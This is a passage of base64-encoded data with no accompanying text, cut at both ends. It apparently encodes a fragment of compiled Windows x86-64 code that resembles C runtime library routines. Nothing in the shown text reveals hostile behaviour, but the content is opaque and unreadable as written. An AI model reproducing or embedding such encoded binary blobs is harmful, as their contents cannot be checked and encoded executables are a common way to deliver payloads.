++dPk5jUb/PAF3CUGLxvfQqAF0r0L2RPk4IHQOM9JBi8xEjUIC6K0sAABBi8xIiV3g6H0fAACFwA+ECwEAAEiNBcoYAQBKiwToQjhc+DgPjfUAAADoWrH//0iLiJAAAABIOZk4AQAAdRZIjQWfGAEASosE6EI4XPg5D4TKAAAASI0FiRgBAEqLDOhIjVXwSotM+Sj/FQZVAACFwA+EqAAAAECE9g+EgQAAAED+zkCA/gEPhy4BAABOjSQ3SIld0EyL90k7/A+DEAEAAIt11EEPtwYPt8hmiUXw6AEsAAAPt03wZjvBdTaDxgKJddRmg/kKdRu5DQAAAOjiKwAAuQ0AAABmO8F1Fv/GiXXU/8NJg8YCTTv0D4PAAAAA67H/FXRSAACJRdDpsAAAAEWLzkiNTdBMi8dBi9To7vT///IPEACLWAjplwAAAEiNBb8XAQBKiwzoQjhc+Th9TYvOQIT2dDKD6QF0GYP5AXV5RYvOSI1N0EyLx0GL1Oid+v//671Fi85IjU3QTIvHQYvU6KX7///rqUWLzkiNTdBMi8dBi9Tocfn//+uVSotM+ShMjU3UM8BFi8ZIIUQkIEiL10iJRdCJRdj/FfxSAACFwHUJ/xXCUQAAiUXQi13Y8g8QRdDyDxFF4EiLReBIwegghcB1ZItF4IXAdC2D+AV1G+jlnf//xwAJAAAA6Lqd///HAAUAAADpwv3//4tN4OhXnf//6bX9//9IjQXjFgEASosE6EL2RPg4QHQFgD8adB/opZ3//8cAHAAAAOh6nf//gyAA6YX9//+LReQrw+sCM8BIi5wkuAAAAEiDxGBBX0FeQV1BXF9eXcPMSP8lCVMAAMxAU0iD7EBIY9lIjUwkIOhBWP//jUMBPQABAAB3E0iLRCQoSIsID7cEWSUAgAAA6wIzwIB8JDgAdAxIi0wkIIOhqAMAAP1Ig8RAW8PMQFNIg+wwSIvZSI1MJCDoPSoAAEiD+AR3GotUJCC5/f8AAIH6//8AAA9H0UiF23QDZokTSIPEMFvDzMzMSIlcJBBIiWwkGFdBVEFVQVZBV0iD7CBIizpFM+1Ni+FJi+hMi/JMi/lIhckPhO4AAABIi9lNhcAPhKEAAABEOC91CEG4AQAAAOsdRDhvAXUIQbgCAAAA6w+KRwL22E0bwEn32EmDwANNi8xIjUwkUEiL1+icKQAASIvQSIP4/3R1SIXAdGeLTCRQgfn//wAAdjlIg/0BdkeBwQAA//9BuADYAACLwYlMJFDB6ApI/81mQQvAZokDuP8DAABmI8hIg8MCuADcAABmC8hmiQtIA/pIg8MCSIPtAQ+FX////0kr30mJPkjR+0iLw+sbSYv9ZkSJK+vpSYk+6OKb///HACoAAABIg8j/SItcJFhIi2wkYEiDxCBBX0FeQV1BXF/DSYvdRDgvdQhBuAEAAADrHUQ4bwF1CEG4AgAAAOsPikcC9thNG8BJ99hJg8ADTYvMSIvXM8nouigAAEiD+P90mUiFwHSDSIP4BHUDSP/DSAP4SP/D663MzEiD7ChIhcl1DkmDIAC4AQAAAOmXAAAAhdJ1BIgR6+r3woD///91BIgR6+L3wgD4//91C0G5AQAAAEGywOs598IAAP//dRiNggAo//89/wcAAHZIQbkCAAAAQbLg6xn3wgAA4P91NYH6//8QAHctQbkDAAAAQbLwTYvZisLB6gYkPwyAQYgEC0mD6wF17UEK0kmNQQGIEU0hGOsTSYMgAOjEmv//xwAqAAAASIPI/0iDxCjDzEiJXCQISIlsJBBIiXQkGFdBVkFXSIPsIE2L8UyL+UiFyXUY6Iya//+7FgAAAIkY6GCZ//+Lw+kHAQAASIXSdOMzwMYBAEWFwEEPT8D/wEiYSDvQdwzoWpr//7siAAAA68xNhfZ0vUmLeQhIjVkBxgEw6xWKB4TAdAVI/8frArAwiANI/8NB/8hFhcB/5sYDAA+IgAAAAIN8JGgAQYsxdQiAPzUPncDrWOinFwAAhcB1KYA/NX9TfF6DfCRgAEiNRwF0RusDSP/AigiA+TB09oTJdTaKR/8kAesmPQACAAB1CoA/MHQwg/4t6xc9AAEAAHUMgD8wdB+D/i11GusLMsCEwHQS6wPGAzBI/8uKAzw5dPT+wIgDQYA/MXUGQf9GBOseSYPI/0n/wEOAfDgBAHX1Sf/ASY1XAUmLz+h8Qf//M8BIi1wkQEiLbCRISIt0JFBIg8QgQV9BXl/DzEiJVCQQU1VWV0FUQVZBV0iB7CACAABEixFMi/JIi/FFhdIPhO0DAACLOoX/D4TjAwAAQf/KjUf/hcAPheIAAABEi2IEM+1Bg/wBdSaLWQRMjUQkREiDwQSJLkUzyYlsJEC6zAEAAOgFFgAAi8PppQMAAEWF0nU2i1kETI1EJESJKUUzyUiDwQSJbCRAuswBAADo2hUAADPSi8NB9/SF0olWBEAPlcWJLulqAwAAQb//////SIv9TIv1RTvXdChJi8xCi0SWBDPSScHmIEUD10kLxkjB5yBI9/GLwEyL8kgD+EU713XbRTPJiWwkQEyNRCREiS66zAEAAEiNTgTobhUAAEmLzkSJdgRIwekgSIvHhcmJTghAD5XF/8WJLun1AgAAQTvCD4fqAgAARYvCSWPSRCvARYvKSWPYSDvTfElIg8EESI0EnQAAAABNi95MK9hMK95IjQyRiwFBOQQLdRFB/8lI/8pIg+kESDvTfenrF0GLwUErwEhj0EljwYtMhgRBOUyWBHMDQf/ARYXAD4SBAgAAjUf/uyAAAABFi0yGBI1H/kGLbIYEQQ+9wYmsJGACAAB0C0G7HwAAAEQr2OsDRIvbQSvbRImcJHACAACJXCQgRYXbdDdBi8GL1YvL0+pBi8vT4ESLytPlRAvIiawkYAIAAIP/AnYVjUf9i8tBi0SGBNPoC+iJrCRgAgAAM+1FjXD/RIvlRYX2D4i/AQAAi8NBv/////9Bi9lMiawkGAIAAEWNLD5IiVwkOEiJRCQwRTvqdwdCi1SuBOsCi9VBjUX/iZQkeAIAAItMhgRBjUX+RItchgRIiUwkKIlUJCyLlCRwAgAAhdJ0NEiLTCQwRYvDSItEJChJ0+iLykjT4EwLwEHT40GD/QNyGItMJCBBjUX9i0SGBNPoRAvY6wVMi0QkKDPSSYvASPfzRIvCTIvISTvHdhdIuAEAAAD/////SQPBTYvPSA+vw0wDwE07x3cqi5QkYAIAAIvCSQ+vwUmLyEjB4SBJC8tIO8F2Dkn/yUgrwkwDw007x3bjTYXJD4SqAAAATIvVRIvdhf90TkiLnCRoAgAASIPDBA8fAIsDSI1bBEkPr8FMA9BDjQQzRYvCi8hJweogi0SGBEmL0kn/wkE7wEwPQ9JBK8BB/8OJRI4ERDvfcsZIi1wkOIuEJHgCAABJO8JzQkSL1YX/dDhMi5wkaAIAAEyLxUmDwwRDjQQyQf/Ci0yGBEiNFIZBiwNNjVsETAPATAPBRIlCBEnB6CBEO9dy10n/yUWNVf9JweQgQf/NQYvBTAPgQYPuAQ+Jav7//0yLrCQYAgAAQY1SAYvKOxZzEmYPH0QAAIvB/8GJbIYEOw5y9IkWhdJ0Dv/KOWyWBHUGiRaF0nXySYvE6wIzwEiBxCACAABBX0FeQVxfXl1bw8zMzEBVU1ZXQVRBVkFXSI2sJBD5//9IgezwBwAASIsFE/gAAEgzxEiJheAGAABIiUwkOE2L8UiNTCRoTIlNgE2L4EyJRZCL8uhSJAAAi0QkaEG/AQAAAIPgHzwfdQfGRCRwAOsPSI1MJGjonCQAAESIfCRwSItcJDi/IAAAAIvHTYl0JAhIhduNTw0PSMFFM8Az0kGJBCRIjUwkeOiaIwAASIvDQbr/BwAASMHoNEm5////////DwBJI8J1OEmF2XQK90QkeAAAAAF0KUGDZCQEAEyNBTq4AABIi5VQBwAASYvO6BuP//+FwA+FQREAAOkHEQAASTvCdAQzwOs8SIvDSSPBdQVBi8frKkiF23kWSLkAAAAAAAAIAEg7wXUHuAQAAADrD0iLw0jB6DP30EEjx4PIAkWJfCQEQSvHD4ScEAAAQSvHD4SHEAAAQSvHD4RyEAAAQTvHD4RdEAAASLj/////////f0SIfCQwSCPY/8ZIiVwkOPIPEEQkOPIPEUQkWEiLVCRYTIvCiXQkYEnB6DS+AgAAAEmLyEkjykiLwUj32Ei4AAAAAAAAEABIG9tJI9FII9hIA9pI99kbwEUjwkSNJAZFA+DoWSQAAOiIIwAA8g8syIldpI2BAQAAgIPg/vfYG8BIwesgI8GJXaiJRCRAi8P32BvS99pBA9eJVaBBgfw0BAAAD4IaAgAAM8DHhUgDAAAAABAAiYVEAwAAibVAAwAAhdsPhAwBAABFM8BCi0SFpEI5hIVEAwAAD4X2AAAARQPHRDvGdeWDZCQ4AEWNnCTO+///RYvDjUL/QYPjH0HB6AWL90mL30Er84vOSNPjQSvfD71EhaREi+NB99R0BP/A6wIzwCv4Qo0EAoP4cw+HgQAAAEUz9kQ730EPl8ZEA/JFA/BBg/5zd2tBjXj/RY1W/0Q713RIQYvCQSvAjUj/O8JzB0SLTIWk6wNFM8k7ynMGi1SNpOsCM9JBI9SLztPqRCPLQYvLQdPhQQvRQolUlaRB/8pEO9d0BYtVoOu4M8lFhcB0EoNkjaQAQQPPQTvIdfPrA0Uz9kSJdaBFi+dEib1wAQAAx4V0AQAABAAAAOkZAwAAg2QkOABFjZwkzfv//0WLw41C/0GD4x9BwegFi/dJi99BK/OLzkjT40Er3w+9RIWkRIvjQffUdAT/wOsCM8Ar+EKNBAKD+HMPh4EAAABFM/ZEO99BD5fGRAPyRQPwQYP+c3drQY14/0WNVv9EO9d0SEGLwkErwI1I/zvCcwdEi0yFpOsDRTPJO8pzBotUjaTrAjPSQSPUi87T6kQjy0GLy0HT4UEL0UKJVJWkQf/KRDvXdAWLVaDruDPJRYXAdBKDZI2kAEEDz0E7yHXz6wNFM/ZEiXWgRYvnRIm9cAEAAMeFdAEAAAIAAADpKwIAAEGD/DYPhEABAAAzwMeFSAMAAAAAEACJhUQDAACJtUADAACF2w+EIAEAAEUzwEKLRIWkQjmEhUQDAAAPhQoBAABFA8dEO8Z15YNkJDgAD73DdAT/wOsCM8BFM/Yr+Dv+QQ+SxkGDy/9EA/JBg/5zD4aFAAAARTP2vjYEAABEiXWgQSv0SI2NRAMAAIv+M9LB7wWL30jB4wJMi8PoXy///4PmH0GLx0CKztPgiYQdRAMAAESNZwFFi8RJweACRImlQAMAAESJpXABAABNhcAPhFgBAAC7zAEAAEiNjXQBAABMO8MPhyIBAABIjZVEAwAA6Bo4///pKwEAAEGNRv9BO8MPhHH///9Ei9BEjUD/O8JzB0aLTJWk6wNFM8lEO8JzB0KLTIWk6wIzycHpHkGLwcHgAgvIQYvAQolMlaRFO8MPhDL///+LVaDrvPfbSBvAg2QkOACD4AQPvUQFpHQE/8DrAjPARTP2K/hBO/9BD5LGQYPL/0QD8kGD/nN2QkUz9r41BAAARIl1oEEr9EiNjUQDAACL/jPSwe8Fi99IweMCTIvD6FYu//+D5h9Bi8dAis7T4ImEHUQDAADp8v7//0GNRv9BO8N0uESL0ESNQP87wnMHRotMlaTrA0UzyUQ7wnMHQotMhaTrAjPJwekfQ40ECQvIQYvAQolMlaRFO8MPhHv///+LVaDrvkyLwzPS6Oot///o7Y7//8cAIgAAAOjCjf//RIulcAEAAItMJEC4zczMzIXJD4jZBAAA9+GLwkiNFccB///B6AOJRCRQi8iJRCRIhcAPhMgDAABBuCYAAABBO8iLwUEPR8CJRCRM/8iL+A+2jIIisAEAD7a0giOwAQCL2UjB4wIz0kyLw40EDkiNjUQDAACJhUADAADoWy3//0iNDWQB//9IweYCD7eEuSCwAQBIjZEQpwEASI2NRAMAAEyLxkgDy0iNFILoOzb//0SLlUADAABFO9cPh5oAAACLhUQDAACFwHUPRTPkRImlcAEAAOn6AgAAQTvHD4TxAgAARYXkD4ToAgAARTPATIvQRTPJQouMjXQBAABBi8BJD6/KSAPITIvBQomMjXQBAABJweggRQPPRTvMdddFhcAPhKYCAACDvXABAABzcxqLhXABAABEiYSFdAEAAESLpXABAABFA+frhEUz5ESJpXABAAAywOl8AgAARTvnD4etAAAAi510AQAATYvCScHgAkWL4kSJlXABAABNhcB0QLjMAQAASI2NdAEAAEw7wHcOSI2VRAMAAOhPNf//6xpMi8Az0ugzLP//6DaN///HACIAAADoC4z//0SLpXABAACF2w+EA////0E73w+EAwIAAEWF5A+E+gEAAEUzwEyL00UzyUKLjI10AQAAQYvASQ+vykgDyEyLwUKJjI10AQAAScHoIEUDz0U7zHXX6Q3///9FO9RIjZV0AQAAQYvcSI2NRAMAAEgPQ8pMjYVEAwAAQQ9C2kiJTCRYD5LAiVwkREiNlXQBAABJD0PQhMBIiVQkOEUPRdRFM+RFM8lEiaUQBQAAhdsPhBYBAABCizSJhfZ1IUU7zA+F+QAAAEIhtI0UBQAARY1hAUSJpRAFAADp4QAAAEUz20WLwUWF0g+EvgAAAEGL2ffbQYP4c3RdQYv4RTvEdRKDpL0UBQAAAEGNQAGJhRAFAABBjQQYRQPHixSCQYvDSA+v1kgD0IuEvRQFAABIA9BBjQQYTIvaiZS9FAUAAESLpRAFAABJwesgQTvCdAdIi1QkOOudRYXbdE1Bg/hzD4TNAQAAQYvQRTvEdRKDpJUUBQAAAEGNQAGJhRAFAACLhJUUBQAARQPHQYvLSAPIiYyVFAUAAESLpRAFAABIwekgRIvZhcl1s4tcJERBg/hzD4R8AQAASItMJFhIi1QkOEUDz0Q7yw+F6v7//0WLxEnB4AJEiaVwAQAATYXAdEC4zAEAAEiNjXQBAABMO8B3DkiNlRQFAADoOzP//+saTIvAM9LoHyr//+gii///xwAiAAAA6PeJ//9Ei6VwAQAAQYrHhMAPhAgBAACLTCRISI0VAv7+/ytMJExBuCYAAACJTCRID4VC/P//i0QkUItMJECNBIADwCvIdH2NQf+LhIK4sAEAhcAPhMYAAABBO8d0ZkWF5HRhRTPARIvQRTPJQouMjXQBAABBi8BJD6/KSAPITIvBQomMjXQBAABJweggRQPPRTvMdddFhcB0I4O9cAEAAHNzfIuFcAEAAESJhIV0AQAARIulcAEAAEUD5+tlRIulcAEAAEiLdYBIi95FhfYPhMIEAABFM8BFM8lCi0SNpEiNDIBBi8BMjQRIRolEjaRFA89JweggRTvOdd9FhcAPhJIEAACDfaBzD4NlBAAAi0WgRIlEhaREAX2g6XcEAABFM+REiaVwAQAA65n32UyNBfD8/v/34YlMJEyLwsHoA4lEJDiL0IlEJESFwA+EjwMAALkmAAAAO9GLwg9HwTPSiUQkUP/Ii/hBD7aMgCKwAQBBD7a0gCOwAQCL2UjB4wJMi8ONBA5IjY1EAwAAiYVAAwAA6H0o//9IjQ2G/P7/SMHmAg+3hLkgsAEASI2REKcBAEiNjUQDAABMi8ZIA8tIjRSC6F0x//9Ei5VAAwAARTvXD4eCAAAAi4VEAwAAhcB1DEUz9kSJdaDpwgIAAEE7xw+EuQIAAEWF9g+EsAIAAEUzwEyL0EUzyUKLTI2kQYvASQ+vykgDyEyLwUKJTI2kScHoIEUDz0U7znXdRYXAD4R3AgAAg32gc3MRi0WgRIlEhaREi3WgRQP365lFM/ZEiXWgMsDpWQIAAEU79w+HmwAAAItdpE2LwknB4AJFi/JEiVWgTYXAdDq4zAEAAEiNTaRMO8B3DkiNlUQDAADokjD//+saTIvAM9Lodif//+h5iP//xwAiAAAA6E6H//9Ei3WghdsPhCf///9BO98PhOwBAABFhfYPhOMBAABFM8BMi9NFM8lCi0yNpEGLwEkPr8pIA8hMi8FCiUyNpEnB6CBFA89FO8513eku////RTvWSI1VpEGL3kiNjUQDAABID0PKTI2FRAMAAEEPQtpIiU2ID5LAiVwkSEiNVaRJD0PQhMBIiVQkWEUPRdZFM/ZFM8lEibUQBQAAhdsPhBUBAABCizSJhfZ1IUU7zg+F+AAAAEIhtI0UBQAARY1xAUSJtRAFAADp4AAAAEUz20WLwUWF0g+EvgAAAEGL2ffbQYP4c3RdQYv4RTvGdRKDpL0UBQAAAEGNQAGJhRAFAABCjQQDRQPHixSCi4S9FAUAAEgPr9ZIA9BBi8NIA9BCjQQDTIvaiZS9FAUAAESLtRAFAABJwesgQTvCdAdIi1QkWOudRYXbdE1Bg/hzD4RnAQAAQYvQRTvGdRKDpJUUBQAAAEGNQAGJhRAFAACLhJUUBQAARQPHQYvLSAPIiYyVFAUAAESLtRAFAABIwekgRIvZhcl1s4tcJEhBg/hzD4QWAQAASItNiEiLVCRYRQPPRDvLD4Xr/v//RYvGScHgAkSJdaBNhcB0OrjMAQAASI1NpEw7wHcOSI2VFAUAAOiVLv//6xpMi8Az0uh5Jf//6HyG///HACIAAADoUYX//0SLdaBBiseEwA+ErAAAAItUJERMjQVf+f7/K1QkULkmAAAAiVQkRA+Ffvz//4tMJEyLRCQ4jQSAA8AryA+E1/v//41B/0GLhIC4sAEAhcB0akE7xw+Ev/v//0WF9g+Etvv//0UzwESL0EUzyUKLTI2kQYvASQ+vykgDyEyLwUKJTI2kScHoIEUDz0U7znXdRYXAdB6DfaBzcyGLRaBEiUSFpESLdaBFA/dEiXWg6Wf7//9Ei3Wg6V77//9Ii3WAg2WgAEiL3usjg6VAAwAAAEyNhUQDAACDZaAASI1NpEUzybrMAQAA6J4CAABIjZVwAQAASI1NoOge7P//i3wkQIP4Cg+FkAAAAEED/8YGMUiNXgFFheQPhI4AAABFM8BFM8lCi4SNdAEAAEiNDIBBi8BMjQRIRomEjXQBAABFA89JweggRTvMddlFhcB0XIO9cAEAAHNzF4uFcAEAAESJhIV0AQAARAG9cAEAAOs8g6VAAwAAAEyNhUQDAACDpXABAAAASI2NdAEAAEUzybrMAQAA6PMBAADrEYXAdQVBK//rCAQwSI1eAYgGSItFkItMJGCJeASF/3gKgfn///9/dwIDz0iLhVAHAABI/8iL+Ug7x0gPQvhIA/5IO98PhAsBAABEi1WgQbwJAAAARYXSD4T4AAAARTPARTPJQotEjaRIacgAypo7QYvASAPITIvBQolMjaRJweggRQPPRTvKddpFhcB0N4N9oHNzDotFoESJRIWkRAF9oOsjg6VAAwAAAEyNhUQDAACDZaAASI1NpEUzybrMAQAA6C0BAABIjZVwAQAASI1NoOit6v//RItVoESL30WF0kyLwEG5CAAAAEEPlMZEK9u4zczMzEH34MHqA4rCwOACjQwQAslEKsFBjXAwRIvCRTvZcxIzyUEPtsZAgP4wD0TIRIrx6wdBi8FAiDQYg8j/RAPIRDvIdbhIi8dEiHQkMEgrw0k7xEkPT8RIA9hIO98Phf/+//9FM//GAwBEOHwkMEEPlcfrQUyNBW2nAADpEu///0yNBVmnAADpBu///0yNBUWnAADp+u7//0iLlVAHAABMjQUqpwAASYvO6A5+//+FwHU4RTP/gHwkcAB0CkiNTCRo6LISAABBi8dIi43gBgAASDPM6CgT//9IgcTwBwAAQV9BXkFcX15bXcNIg2QkIABFM8lFM8Az0jPJ6OmB///MSIlcJAhIiXQkEFdIg+wgSYvZSYvwSIv6TYXJdQQzwOtWSIXJdRXovYL//7sWAAAAiRjokYH//4vD6zxIhfZ0Ekg7+3INTIvDSIvW6KAq///ry0yLxzPS6IQh//9IhfZ0xUg7+3MM6H2C//+7IgAAAOu+uBYAAABIi1wkMEiLdCQ4SIPEIF/DzEiD7CjoBxkAAIvISIPEKOnwGAAASIlcJBBIiXQkGIhMJAhXSIPsIEiLykiL2ujOq///i0sUTGPI9sHAD4SOAAAAizsz9kiLUwgrewhIjUIBSIkDi0Mg/8iJQxCF/34bRIvHQYvJ6Lbg//+L8EiLSwg794pEJDCIAetrQY1BAoP4AXYiSYvJSI0V+/oAAEmLwUjB+AaD4T9IiwTCSI0MyUiNFMjrB0iNFRzmAAD2QjggdLoz0kGLyUSNQgLoiA4AAEiD+P91pvCDSxQQsAHrGUG4AQAAAEiNVCQwQYvJ6D7g//+D+AEPlMBIi1wkOEiLdCRASIPEIF/DQFNIg+wgi1EUweoD9sIBdASwAetei0EUqMB0CUiLQQhIOQF0TItJGOifxv//SIvYSIP4/3Q7QbkBAAAATI1EJDgz0kiLyP8VHDUAAIXAdCFIjVQkMEiLy/8VyjYAAIXAdA9Ii0QkMEg5RCQ4D5TA6wIywEiDxCBbw8zMzEiJXCQIV0iD7CCL+UiL2kiLyuh1qv//i0MUqAZ1FejJgP//xwAJAAAA8INLFBCDyP/reYtDFMHoDKgBdA3oqoD//8cAIgAAAOvfi0MUqAF0HEiLy+gr////g2MQAITAdMhIi0MISIkD8INjFP7wg0sUAvCDYxT3g2MQAItDFKnABAAAdRRIi8voV6r//4TAdQhIi8voFxoAAEiL00CKz+j8/f//hMB0gUAPtsdIi1wkMEiDxCBfw8xIg+wog/n+dQ3oJoD//8cACQAAAOtChcl4LjsNPP0AAHMmSGPJSI0VMPkAAEiLwYPhP0jB+AZIjQzJSIsEwg+2RMg4g+BA6xLo53///8cACQAAAOi8fv//M8BIg8Qow8zMzMzMzMzMzMzMzMxBVEFVQVZIgexQBAAASIsFvOIAAEgzxEiJhCQQBAAATYvhTYvwTIvpSIXJdRpIhdJ0FeiRf///xwAWAAAA6GZ+///pOAMAAE2F9nTmTYXkdOFIg/oCD4IkAwAASImcJEgEAABIiawkQAQAAEiJtCQ4BAAASIm8JDAEAABMibwkKAQAAEyNev9ND6/+TAP5M8lIiUwkIGZmZg8fhAAAAAAAM9JJi8dJK8VJ9/ZIjVgBSIP7CA+HiwAAAE07/XZlS400LkmL3UiL/kk793cgDx8ASIvTSIvPSYvE/xXxNAAAhcBID0/fSQP+STv/duNNi8ZJi9dJO990Hkkr3w8fRAAAD7YCD7YME4gEE4gKSI1SAUmD6AF16k0r/k07/XekSItMJCBIg+kBSIlMJCAPiCUCAABMi2zMMEyLvMwgAgAA6Vz///9I0etJi81JD6/eSYvESo00K0iL1v8VcjQAAIXAfilNi85Mi8ZMO+50Hg8fAEEPtgBJi9BIK9MPtgqIAkGICEn/wEmD6QF15UmL10mLzUmLxP8VNjQAAIXAfipNi8ZJi9dNO+90H02LzU0rz5APtgJBD7YMEUGIBBGICkiNUgFJg+gBdehJi9dIi85Ji8T/FfkzAACFwH4tTYvGSYvXSTv3dCJMi85NK88PH0AAD7YCQQ+2DBFBiAQRiApIjVIBSYPoAXXoSYvdSYv/ZpBIO/N2HUkD3kg73nMVSIvWSIvLSYvE/xWkMwAAhcB+5eseSQPeSTvfdxZIi9ZIi8tJi8T/FYczAACFwH7lDx8ASIvvSSv+SDv+dhNIi9ZIi89Ji8T/FWYzAACFwH/iSDv7cjhNi8ZIi9d0HkyLy0wrzw+2AkEPtgwRQYgEEYgKSI1SAUmD6AF16Eg790iLw0gPRcZIi/DpZf///0g79XMgSSvuSDvudhhIi9ZIi81Ji8T/FQkzAACFwHTl6x4PHwBJK+5JO+12E0iL1kiLzUmLxP8V6TIAAIXAdOVJi89Ii8VIK8tJK8VIO8FIi0wkIHwrTDvtcxVMiWzMMEiJrMwgAgAASP/BSIlMJCBJO98Pg//9//9Mi+vpdP3//0k733MVSIlczDBMibzMIAIAAEj/wUiJTCQgTDvtD4PU/f//TIv96Un9//9Ii7wkMAQAAEiLtCQ4BAAASIusJEAEAABIi5wkSAQAAEyLvCQoBAAASIuMJBAEAABIM8zoUQz//0iBxFAEAABBXkFdQVzDzMzMQFVBVEFVQVZBV0iD7GBIjWwkUEiJXUBIiXVISIl9UEiLBQrfAABIM8VIiUUISGNdYE2L+UiJVQBFi+hIi/mF234USIvTSYvJ6AsWAAA7w41YAXwCi9hEi3V4RYX2dQdIiwdEi3AM952AAAAARIvLTYvHQYvOG9KDZCQoAEiDZCQgAIPiCP/C6Ji3//9MY+CFwA+ENgIAAEmLxEm48P///////w9IA8BIjUgQSDvBSBvSSCPRdFNIgfoABAAAdy5IjUIPSDvCdwNJi8BIg+Dw6FwkAABIK+BIjXQkUEiF9g+EzgEAAMcGzMwAAOsWSIvK6IuQ//9Ii/BIhcB0DscA3d0AAEiDxhDrAjP2SIX2D4SfAQAARIlkJChEi8tNi8dIiXQkILoBAAAAQYvO6PO2//+FwA+EegEAAEiDZCRAAEWLzEiDZCQ4AEyLxkiDZCQwAEGL1UyLfQCDZCQoAEmLz0iDZCQgAOixf///SGP4hcAPhD0BAAC6AAQAAESF6nRSi0VwhcAPhCoBAAA7+A+PIAEAAEiDZCRAAEWLzEiDZCQ4AEyLxkiDZCQwAEGL1YlEJChJi89Ii0VoSIlEJCDoWX///4v4hcAPhegAAADp4QAAAEiLz0gDyUiNQRBIO8hIG8lII8h0U0g7ync1SI1BD0g7wXcKSLjw////////D0iD4PDoKCMAAEgr4EiNXCRQSIXbD4SaAAAAxwPMzAAA6xPoWo///0iL2EiFwHQOxwDd3QAASIPDEOsCM9tIhdt0ckiDZCRAAEWLzEiDZCQ4AEyLxkiDZCQwAEGL1Yl8JChJi89IiVwkIOivfv//hcB0MUiDZCQ4ADPSSCFUJDBEi8+LRXBMi8NBi86FwHVlIVQkKEghVCQg6OS1//+L+IXAdWBIjUvwgTnd3QAAdQXolXn//zP/SIX2dBFIjU7wgTnd3QAAdQXofXn//4vHSItNCEgzzehnCf//SItdQEiLdUhIi31QSI1lEEFfQV5BXUFcXcOJRCQoSItFaEiJRCQg65VIjUvwgTnd3QAAdafoNXn//+ugzMzMSIlcJAhIiXQkEFdIg+xwSIvySYvZSIvRQYv4SI1MJFDo1zP//4uEJMAAAABIjUwkWIlEJEBMi8uLhCS4AAAARIvHiUQkOEiL1ouEJLAAAACJRCQwSIuEJKgAAABIiUQkKIuEJKAAAACJRCQg6Hf8//+AfCRoAHQMSItMJFCDoagDAAD9TI1cJHBJi1sQSYtzGEmL41/DzMxIg+wo6DOx//8zyYTAD5TBi8FIg8Qow8xIg+wogz2F7wAAAHU2SIXJdRroSXj//8cAFgAAAOged///uP///39Ig8Qow0iF0nThSYH4////f3fYSIPEKOn9AAAARTPJSIPEKOkBAAAAzEiJXCQISIlsJBBIiXQkGFdIg+xQSYv4SIvySIvpTYXAdQczwOmyAAAASIXtdRro3Xf//8cAFgAAAOiydv//uP///3/pkwAAAEiF9nThu////39IO/t2Eui0d///xwAWAAAA6Il2///rcEmL0UiNTCQw6IYy//9Ii0QkOEiLiDABAABIhcl1EkyLx0iL1kiLzehbAAAAi9jrLYl8JChEi89Mi8VIiXQkILoBEAAA6KYRAACFwHUN6FV3///HABYAAADrA41Y/oB8JEgAdAxIi0QkMIOgqAMAAP2Lw0iLXCRgSItsJGhIi3QkcEiDxFBfw0yL2kyL0U2FwHUDM8DDQQ+3Ck2NUgJBD7cTTY1bAo1Bv4P4GUSNSSCNQr9ED0fJg/gZjUogQYvBD0fKK8F1C0WFyXQGSYPoAXXEw8xIg+woSIXJdRnoxnb//8cAFgAAAOibdf//SIPI/0iDxCjDTIvBM9JIiw1e9gAASIPEKEj/JZMqAADMzMxIiVwkCEyJTCQgV0iD7CBJi/lJi9iLCujUuv//kEiLA0hjCEiL0UiLwUjB+AZMjQWM7wAAg+I/SI0U0kmLBMD2RNA4AXQJ6M0AAACL2OsO6ER2///HAAkAAACDy/+LD+i0uv//i8NIi1wkMEiDxCBfw8zMzIlMJAhIg+w4SGPRg/r+dRXo73X//4MgAOgHdv//xwAJAAAA63SFyXhYOxUd8wAAc1BIi8pMjQUR7wAAg+E/SIvCSMH4BkiNDMlJiwTA9kTIOAF0LUiNRCRAiVQkUIlUJFhMjUwkUEiNVCRYSIlEJCBMjUQkIEiNTCRI6A3////rG+h+df//gyAA6JZ1///HAAkAAADoa3T//4PI/0iDxDjDzMzMSIlcJAhXSIPsIEhj+YvP6NC6//9Ig/j/dQQz2+taSIsFg+4AALkCAAAAg/8BdQlAhLjIAAAAdQ07+XUg9oCAAAAAAXQX6Jq6//+5AQAAAEiL2OiNuv//SDvDdL6Lz+iBuv//SIvI/xW0KAAAhcB1qv8VuigAAIvYi8/oqbn//0iL10yNBR/uAACD4j9Ii89IwfkGSI0U0kmLDMjGRNE4AIXbdAyLy+hldP//g8j/6wIzwEiLXCQwSIPEIF/DzMzMg0kY/zPASIkBSIlBCIlBEEiJQRxIiUEoh0EUw0iJXCQQSIl0JBiJTCQIV0FUQVVBVkFXSIPsIEWL8EyL+khj2YP7/nUY6FZ0//+DIADobnT//8cACQAAAOmSAAAAhcl4djsdgfEAAHNuSIvDSIvzSMH+BkyNLW7tAACD4D9MjSTASYtE9QBC9kTgOAF0SYvL6IO4//9Ig8//SYtE9QBC9kTgOAF1FegVdP//xwAJAAAA6Opz//+DIADrEEWLxkmL14vL6EQAAABIi/iLy+huuP//SIvH6xzoxHP//4MgAOjcc///xwAJAAAA6LFy//9Ig8j/SItcJFhIi3QkYEiDxCBBX0FeQV1BXF/DzEiJXCQISIl0JBBXSIPsIEhj2UGL+IvLSIvy6Pm4//9Ig/j/dRHoinP//8cACQAAAEiDyP/rU0SLz0yNRCRISIvWSIvI/xVqJwAAhcB1D/8VECcAAIvI6Oly///r00iLRCRISIP4/3TISIvTTI0FauwAAIPiP0iLy0jB+QZIjRTSSYsMyIBk0Tj9SItcJDBIi3QkOEiDxCBfw8zMzOlv/v//zMzM6Vf////MzMxmiUwkCEiD7CjoAg4AAIXAdB9MjUQkOLoBAAAASI1MJDDoWg4AAIXAdAcPt0QkMOsFuP//AABIg8Qow8xIiVwkEFVWV0FWQVdIg+xASIsFvdUAAEgzxEiJRCQwRTPSTI0di/IAAE2FyUiNPYMxAABIi8JMi/pND0XZSIXSQY1qAUgPRfpEi/VND0XwSPfYSBv2SCPxTYX2dQxIx8D+////6U4BAABmRTlTBnVoRA+2D0j/x0WEyXgXSIX2dANEiQ5FhMlBD5XCSYvC6SQBAABBisEk4DzAdQVBsALrHkGKwSTwPOB1BUGwA+sQQYrBJPg88A+F6QAAAEGwBEEPtsC5BwAAACvIi9XT4kGK2CvVQSPR6ylFikMEQYsTQYpbBkGNQP48Ag+HtgAAAEA63Q+CrQAAAEE62A+DpAAAAA+260k77kSLzU0PQ87rHg+2D0j/x4rBJMA8gA+FgwAAAIvCg+E/weAGi9EL0EiLx0krx0k7wXLXTDvNcxxBD7bAQSrZZkGJQwQPtsNmQYlDBkGJE+kD////jYIAKP//Pf8HAAB2PoH6AAARAHM2QQ+2wMdEJCCAAAAAx0Q